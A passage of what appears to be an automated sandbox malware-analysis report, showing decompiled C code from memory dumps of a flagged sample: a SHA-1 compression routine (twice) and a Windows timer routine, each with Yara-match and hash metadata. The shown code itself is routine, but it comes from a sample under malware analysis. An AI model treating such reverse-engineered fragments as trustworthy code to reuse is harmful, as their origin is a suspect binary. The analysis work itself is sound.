                                                                      					asm("rol esi, 0x5");
                                                                      					_t423 = _t508 + (_t361 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t511 = _t280;
                                                                      					_v16 = _t361;
                                                                      					_t368 = _v12;
                                                                      					_v12 = _t423;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t293 = _t423 + (_t280 ^ _t336 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                      					_t426 = _v12;
                                                                      					_v8 = _t336;
                                                                      					_v8 = _t368;
                                                                      					_v12 = _t293;
                                                                      					asm("rol eax, 0x5");
                                                                      					_t468 = _t468 + 5;
                                                                      					_t361 = _v12;
                                                                      					asm("ror edx, 0x2");
                                                                      					_t146 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                      					_t512 = _t293 + (_t336 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t146;
                                                                      					_t296 = _v8;
                                                                      					_v8 = _t426;
                                                                      					_v12 = _t512;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t407 = _v8;
                                                                      					_t505 = _t512 + (_t296 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
                                                                      					_v16 = _t296;
                                                                      					_t280 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t505;
                                                                      				} while (_t468 < 0x28);
                                                                      				_v8 = 0x28;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t407;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t516 = ((_t361 | _t280) & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
                                                                      					_t474 = _v12;
                                                                      					_v12 = _t516;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t342 = _v8;
                                                                      					asm("ror edi, 0x2");
                                                                      					_t435 = ((_t280 | _t474) & _t361 | _t280 & _t474) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
                                                                      					_v16 = _t361;
                                                                      					_t372 = _v12;
                                                                      					_v12 = _t435;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v8 = _t280;
                                                                      					_t437 = ((_t474 | _t372) & _t280 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t300 = _v12;
                                                                      					_v8 = _t474;
                                                                      					_v12 = _t437;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_t528 = ((_t372 | _t300) & _t474 | _t372 & _t300) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
                                                                      					_v16 = _v8;
                                                                      					_t440 = _t372;
                                                                      					_t361 = _v12;
                                                                      					_v8 = _t440;
                                                                      					_v12 = _t528;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _v8;
                                                                      					_t505 = ((_t300 | _t361) & _t440 | _t300 & _t361) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
                                                                      					_t407 = _t300;
                                                                      					_t280 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t505;
                                                                      					_t343 = _t342 + 5;
                                                                      					_v8 = _t343;
                                                                      				} while (_t343 < 0x3c);
                                                                      				_t482 = 0x3c;
                                                                      				_v8 = 0x3c;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_t483 = _v8;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t531 = (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
                                                                      					_t348 = _v12;
                                                                      					_v16 = _t407;
                                                                      					_v12 = _t531;
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t448 = (_t361 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t361;
                                                                      					_t373 = _v12;
                                                                      					_v12 = _t448;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v16 = _t280;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t304 = (_t280 ^ _t348 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
                                                                      					_t407 = _v12;
                                                                      					_v12 = _t304;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t348;
                                                                      					_t538 = (_t348 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
                                                                      					_t306 = _t373;
                                                                      					_v8 = _t348;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t373;
                                                                      					_t361 = _v12;
                                                                      					_v12 = _t538;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t482 = _t483 + 5;
                                                                      					_t505 = (_t306 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t306;
                                                                      					_t280 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t407;
                                                                      					_v12 = _t505;
                                                                      					_v8 = _t482;
                                                                      				} while (_t482 < 0x50);
                                                                      				_t484 = _a4;
                                                                      				_t484[2] = _t484[2] + _t361;
                                                                      				_t484[3] = _t484[3] + _t407;
                                                                      				_t312 = _t484[4] + _v16;
                                                                      				 *_t484 =  *_t484 + _t505;
                                                                      				_t484[1] = _t484[1] + _t280;
                                                                      				_t484[4] = _t312;
                                                                      				_t484[0x17] = 0;
                                                                      				return _t312;
                                                                      			}
                                                                      0x004090a8
                                                                      0x004090ab
                                                                      0x004090b2
                                                                      0x004090b5
                                                                      0x004090b8
                                                                      0x004090bb
                                                                      0x004090ce
                                                                      0x004090d1
                                                                      0x004090dc
                                                                      0x004090df
                                                                      0x004090eb
                                                                      0x004090ee
                                                                      0x004090f4
                                                                      0x004090f7
                                                                      0x004090fa
                                                                      0x00409101
                                                                      0x00409111
                                                                      0x00409114
                                                                      0x0040911a
                                                                      0x0040911d
                                                                      0x00409124
                                                                      0x00409126
                                                                      0x00409129
                                                                      0x0040912c
                                                                      0x0040912f
                                                                      0x00409132
                                                                      0x00409139
                                                                      0x00409148
                                                                      0x0040914b
                                                                      0x00409152
                                                                      0x00409155
                                                                      0x00409158
                                                                      0x0040915b
                                                                      0x0040915e
                                                                      0x00409161
                                                                      0x00409164
                                                                      0x0040916d
                                                                      0x0040917e
                                                                      0x00409186
                                                                      0x0040918c
                                                                      0x0040918f
                                                                      0x00409191
                                                                      0x00409194
                                                                      0x00409197
                                                                      0x004091a4

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 9a16899f6d4f2b3c0a8a619eb872227bae52f09b6b7aba11155acd4c728968c4
                                                                      • Instruction ID: c6bd933662e194c17fd244281a6b6f2211331088f5ec86a73b3659ffbecce607
                                                                      • Opcode Fuzzy Hash: 9a16899f6d4f2b3c0a8a619eb872227bae52f09b6b7aba11155acd4c728968c4
                                                                      • Instruction Fuzzy Hash: DF021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E00408C60(signed int* _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				char _v304;
                                                                      				signed char* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int _t279;
                                                                      				signed int _t285;
                                                                      				signed int _t288;
                                                                      				signed int _t292;
                                                                      				signed int _t295;
                                                                      				signed int _t299;
                                                                      				signed int _t303;
                                                                      				signed int _t305;
                                                                      				signed int _t311;
                                                                      				signed int _t318;
                                                                      				signed int _t320;
                                                                      				signed int _t323;
                                                                      				signed int _t325;
                                                                      				signed int _t334;
                                                                      				signed int _t340;
                                                                      				signed int _t341;
                                                                      				signed int _t346;
                                                                      				signed int _t353;
                                                                      				signed int _t357;
                                                                      				signed int _t358;
                                                                      				signed int _t362;
                                                                      				signed int _t365;
                                                                      				signed int _t369;
                                                                      				signed int _t370;
                                                                      				signed int _t399;
                                                                      				signed int _t404;
                                                                      				signed int _t410;
                                                                      				signed int _t413;
                                                                      				signed int _t420;
                                                                      				signed int _t423;
                                                                      				signed int _t432;
                                                                      				signed int _t434;
                                                                      				signed int _t437;
                                                                      				signed int _t445;
                                                                      				signed int _t459;
                                                                      				signed int _t462;
                                                                      				signed int _t463;
                                                                      				signed int _t464;
                                                                      				signed int _t470;
                                                                      				signed int _t478;
                                                                      				signed int _t479;
                                                                      				signed int* _t480;
                                                                      				signed int* _t481;
                                                                      				signed int _t488;
                                                                      				signed int _t491;
                                                                      				signed int _t496;
                                                                      				signed int _t499;
                                                                      				signed int _t502;
                                                                      				signed int _t505;
                                                                      				signed int _t506;
                                                                      				signed int _t510;
                                                                      				signed int _t522;
                                                                      				signed int _t525;
                                                                      				signed int _t532;
                                                                      				void* _t536;
                                                                      
                                                                      				_t481 = _a4;
                                                                      				_t353 = 0;
                                                                      				_t2 =  &(_t481[7]); // 0x1b
                                                                      				_t277 = _t2;
                                                                      				do {
                                                                      					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                      					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                                      					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                                      					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                                      					_t353 = _t353 + 4;
                                                                      					_t277 =  &(_t277[0x10]);
                                                                      				} while (_t353 < 0x10);
                                                                      				_t278 =  &_v304;
                                                                      				_v8 = 0x10;
                                                                      				do {
                                                                      					_t399 =  *(_t278 - 0x18);
                                                                      					_t459 =  *(_t278 - 0x14);
                                                                      					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                                                      					asm("rol ecx, 1");
                                                                      					asm("rol ebx, 1");
                                                                      					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                                      					_t278[8] = _t357;
                                                                      					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                      					_t278 =  &(_t278[4]);
                                                                      					asm("rol ebx, 1");
                                                                      					asm("rol edx, 1");
                                                                      					_t46 =  &_v8;
                                                                      					 *_t46 = _v8 - 1;
                                                                      					_t278[6] = _t318 ^ _t399;
                                                                      					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                                      				} while ( *_t46 != 0);
                                                                      				_t320 =  *_t481;
                                                                      				_t279 = _t481[1];
                                                                      				_t358 = _t481[2];
                                                                      				_t404 = _t481[3];
                                                                      				_v12 = _t320;
                                                                      				_v16 = _t481[4];
                                                                      				_v8 = 0;
                                                                      				do {
                                                                      					asm("rol ebx, 0x5");
                                                                      					_t462 = _v8;
                                                                      					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                      					_t323 = _v12;
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t404;
                                                                      					_v12 = _t488;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v8 = _t358;
                                                                      					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                      					_t491 = _t279;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t362 = _v12;
                                                                      					_v8 = _t323;
                                                                      					_t325 = _v8;
                                                                      					_v12 = _t410;
                                                                      					asm("rol edx, 0x5");
                                                                      					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                      					_t413 = _v12;
                                                                      					_v16 = _t491;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t362;
                                                                      					_v12 = _t285;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t325;
                                                                      					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                      					_t358 = _v12;
                                                                      					_t288 = _v8;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t413;
                                                                      					_v12 = _t496;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t288;
                                                                      					_t279 = _v12;
                                                                      					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                      					_t404 = _v8;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t463 = _t462 + 5;
                                                                      					_t320 = _t499;
                                                                      					_v12 = _t320;
                                                                      					_v8 = _t463;
                                                                      				} while (_t463 < 0x14);
                                                                      				_t464 = 0x14;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t404;
                                                                      					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                      					_t334 = _v12;
                                                                      					_v12 = _t502;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t505 = _t279;
                                                                      					_v16 = _t358;
                                                                      					_t365 = _v12;
                                                                      					_v12 = _t420;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                      					_t423 = _v12;
                                                                      					_v8 = _t334;
                                                                      					_v8 = _t365;
                                                                      					_v12 = _t292;
                                                                      					asm("rol eax, 0x5");
                                                                      					_t464 = _t464 + 5;
                                                                      					_t358 = _v12;
                                                                      					asm("ror edx, 0x2");
                                                                      					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                      					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                                                      					_t295 = _v8;
                                                                      					_v8 = _t423;
                                                                      					_v12 = _t506;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t404 = _v8;
                                                                      					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                                                      					_v16 = _t295;
                                                                      					_t279 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t499;
                                                                      				} while (_t464 < 0x28);
                                                                      				_v8 = 0x28;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t404;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                                                      					_t470 = _v12;
                                                                      					_v12 = _t510;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t340 = _v8;
                                                                      					asm("ror edi, 0x2");
                                                                      					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                                                      					_v16 = _t358;
                                                                      					_t369 = _v12;
                                                                      					_v12 = _t432;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v8 = _t279;
                                                                      					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t299 = _v12;
                                                                      					_v8 = _t470;
                                                                      					_v12 = _t434;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                                                      					_v16 = _v8;
                                                                      					_t437 = _t369;
                                                                      					_t358 = _v12;
                                                                      					_v8 = _t437;
                                                                      					_v12 = _t522;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _v8;
                                                                      					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                                                      					_t404 = _t299;
                                                                      					_t279 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t499;
                                                                      					_t341 = _t340 + 5;
                                                                      					_v8 = _t341;
                                                                      				} while (_t341 < 0x3c);
                                                                      				_t478 = 0x3c;
                                                                      				_v8 = 0x3c;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_t479 = _v8;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                                                      					_t346 = _v12;
                                                                      					_v16 = _t404;
                                                                      					_v12 = _t525;
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t358;
                                                                      					_t370 = _v12;
                                                                      					_v12 = _t445;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v16 = _t279;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                                                      					_t404 = _v12;
                                                                      					_v12 = _t303;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t346;
                                                                      					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                                      					_t305 = _t370;
                                                                      					_v8 = _t346;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t370;
                                                                      					_t358 = _v12;
                                                                      					_v12 = _t532;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t478 = _t479 + 5;
                                                                      					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t305;
                                                                      					_t279 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t404;
                                                                      					_v12 = _t499;
                                                                      					_v8 = _t478;
                                                                      				} while (_t478 < 0x50);
                                                                      				_t480 = _a4;
                                                                      				_t480[2] = _t480[2] + _t358;
                                                                      				_t480[3] = _t480[3] + _t404;
                                                                      				_t311 = _t480[4] + _v16;
                                                                      				 *_t480 =  *_t480 + _t499;
                                                                      				_t480[1] = _t480[1] + _t279;
                                                                      				_t480[4] = _t311;
                                                                      				_t480[0x17] = 0;
                                                                      				return _t311;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                      • Instruction ID: d8c2fb7df0c5b58699e1db2dcf7a8d999a68655801dbc0658ec4d80d3c45db5f
                                                                      • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                      • Instruction Fuzzy Hash: 19021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E00A1B944(signed int* __ecx, char __edx) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				intOrPtr _v44;
                                                                      				signed int* _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				char _v77;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t68;
                                                                      				char* _t73;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr _t78;
                                                                      				signed int _t82;
                                                                      				intOrPtr _t83;
                                                                      				void* _t87;
                                                                      				char _t88;
                                                                      				intOrPtr* _t89;
                                                                      				intOrPtr _t91;
                                                                      				void* _t97;
                                                                      				intOrPtr _t100;
                                                                      				void* _t102;
                                                                      				void* _t107;
                                                                      				signed int _t108;
                                                                      				intOrPtr* _t112;
                                                                      				void* _t113;
                                                                      				intOrPtr* _t114;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t117;
                                                                      				signed int _t118;
                                                                      				void* _t130;
                                                                      
                                                                      				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                      				_v8 =  *0xaed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                      				_t112 = __ecx;
                                                                      				_v77 = __edx;
                                                                      				_v48 = __ecx;
                                                                      				_v28 = 0;
                                                                      				_t5 = _t112 + 0xc; // 0x575651ff
                                                                      				_t105 =  *_t5;
                                                                      				_v20 = 0;
                                                                      				_v16 = 0;
                                                                      				if(_t105 == 0) {
                                                                      					_t50 = _t112 + 4; // 0x5de58b5b
                                                                      					_t60 =  *__ecx |  *_t50;
                                                                      					if(( *__ecx |  *_t50) != 0) {
                                                                      						 *__ecx = 0;
                                                                      						__ecx[1] = 0;
                                                                      						if(E00A17D50() != 0) {
                                                                      							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t65 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t65 != 0) {
                                                                      							E00AC8CD6(_t112);
                                                                      						}
                                                                      						_push(0);
                                                                      						_t52 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t52);
                                                                      						_t60 = E00A39E20();
                                                                      					}
                                                                      					L20:
                                                                      					_pop(_t107);
                                                                      					_pop(_t113);
                                                                      					_pop(_t87);
                                                                      					return E00A3B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                      				}
                                                                      				_t8 = _t112 + 8; // 0x8b000cc2
                                                                      				_t67 =  *_t8;
                                                                      				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                      				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                      				_t108 =  *(_t67 + 0x14);
                                                                      				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                      				_t105 = 0x2710;
                                                                      				asm("sbb eax, edi");
                                                                      				_v44 = _t88;
                                                                      				_v52 = _t108;
                                                                      				_t60 = E00A3CE00(_t97, _t68, 0x2710, 0);
                                                                      				_v56 = _t60;
                                                                      				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                      					L3:
                                                                      					 *(_t112 + 0x44) = _t60;
                                                                      					_t105 = _t60 * 0x2710 >> 0x20;
                                                                      					 *_t112 = _t88;
                                                                      					 *(_t112 + 4) = _t108;
                                                                      					_v20 = _t60 * 0x2710;
                                                                      					_v16 = _t60 * 0x2710 >> 0x20;
                                                                      					if(_v77 != 0) {
                                                                      						L16:
                                                                      						_v36 = _t88;
                                                                      						_v32 = _t108;
                                                                      						if(E00A17D50() != 0) {
                                                                      							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                      						} else {
                                                                      							_t73 = 0x7ffe0386;
                                                                      						}
                                                                      						if( *_t73 != 0) {
                                                                      							_t105 = _v40;
                                                                      							E00AC8F6A(_t112, _v40, _t88, _t108);
                                                                      						}
                                                                      						_push( &_v28);
                                                                      						_push(0);
                                                                      						_push( &_v36);
                                                                      						_t48 = _t112 + 0x10; // 0x778df98b
                                                                      						_push( *_t48);
                                                                      						_t60 = E00A3AF60();
                                                                      						goto L20;
                                                                      					} else {
                                                                      						_t89 = 0x7ffe03b0;
                                                                      						do {
                                                                      							_t114 = 0x7ffe0010;
                                                                      							do {
                                                                      								_t77 =  *0xae8628; // 0x0
                                                                      								_v68 = _t77;
                                                                      								_t78 =  *0xae862c; // 0x0
                                                                      								_v64 = _t78;
                                                                      								_v72 =  *_t89;
                                                                      								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                      								while(1) {
                                                                      									_t105 =  *0x7ffe000c;
                                                                      									_t100 =  *0x7ffe0008;
                                                                      									if(_t105 ==  *_t114) {
                                                                      										goto L8;
                                                                      									}
                                                                      									asm("pause");
                                                                      								}
                                                                      								L8:
                                                                      								_t89 = 0x7ffe03b0;
                                                                      								_t115 =  *0x7ffe03b0;
                                                                      								_t82 =  *0x7FFE03B4;
                                                                      								_v60 = _t115;
                                                                      								_t114 = 0x7ffe0010;
                                                                      								_v56 = _t82;
                                                                      							} while (_v72 != _t115 || _v76 != _t82);
                                                                      							_t83 =  *0xae8628; // 0x0
                                                                      							_t116 =  *0xae862c; // 0x0
                                                                      							_v76 = _t116;
                                                                      							_t117 = _v68;
                                                                      						} while (_t117 != _t83 || _v64 != _v76);
                                                                      						asm("sbb edx, [esp+0x24]");
                                                                      						_t102 = _t100 - _v60 - _t117;
                                                                      						_t112 = _v48;
                                                                      						_t91 = _v44;
                                                                      						asm("sbb edx, eax");
                                                                      						_t130 = _t105 - _v52;
                                                                      						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                      							_t88 = _t102 - _t91;
                                                                      							asm("sbb edx, edi");
                                                                      							_t108 = _t105;
                                                                      						} else {
                                                                      							_t88 = 0;
                                                                      							_t108 = 0;
                                                                      						}
                                                                      						goto L16;
                                                                      					}
                                                                      				} else {
                                                                      					if( *(_t112 + 0x44) == _t60) {
                                                                      						goto L20;
                                                                      					}
                                                                      					goto L3;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A1B9A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: 50a3baea8d301358161ed7bf68534b333612474a81fa44b0f88afc2aef7cd67a
                                                                      • Instruction ID: 81a29dcfcc78e9437e4ad65d38fc2a9404a7106538996e81044ba91cd2e584a1
                                                                      • Opcode Fuzzy Hash: 50a3baea8d301358161ed7bf68534b333612474a81fa44b0f88afc2aef7cd67a
                                                                      • Instruction Fuzzy Hash: F4513571A18340CFC720DF69C58096ABBF5BF88750F24896EF58597255DB30EC84CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E009FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
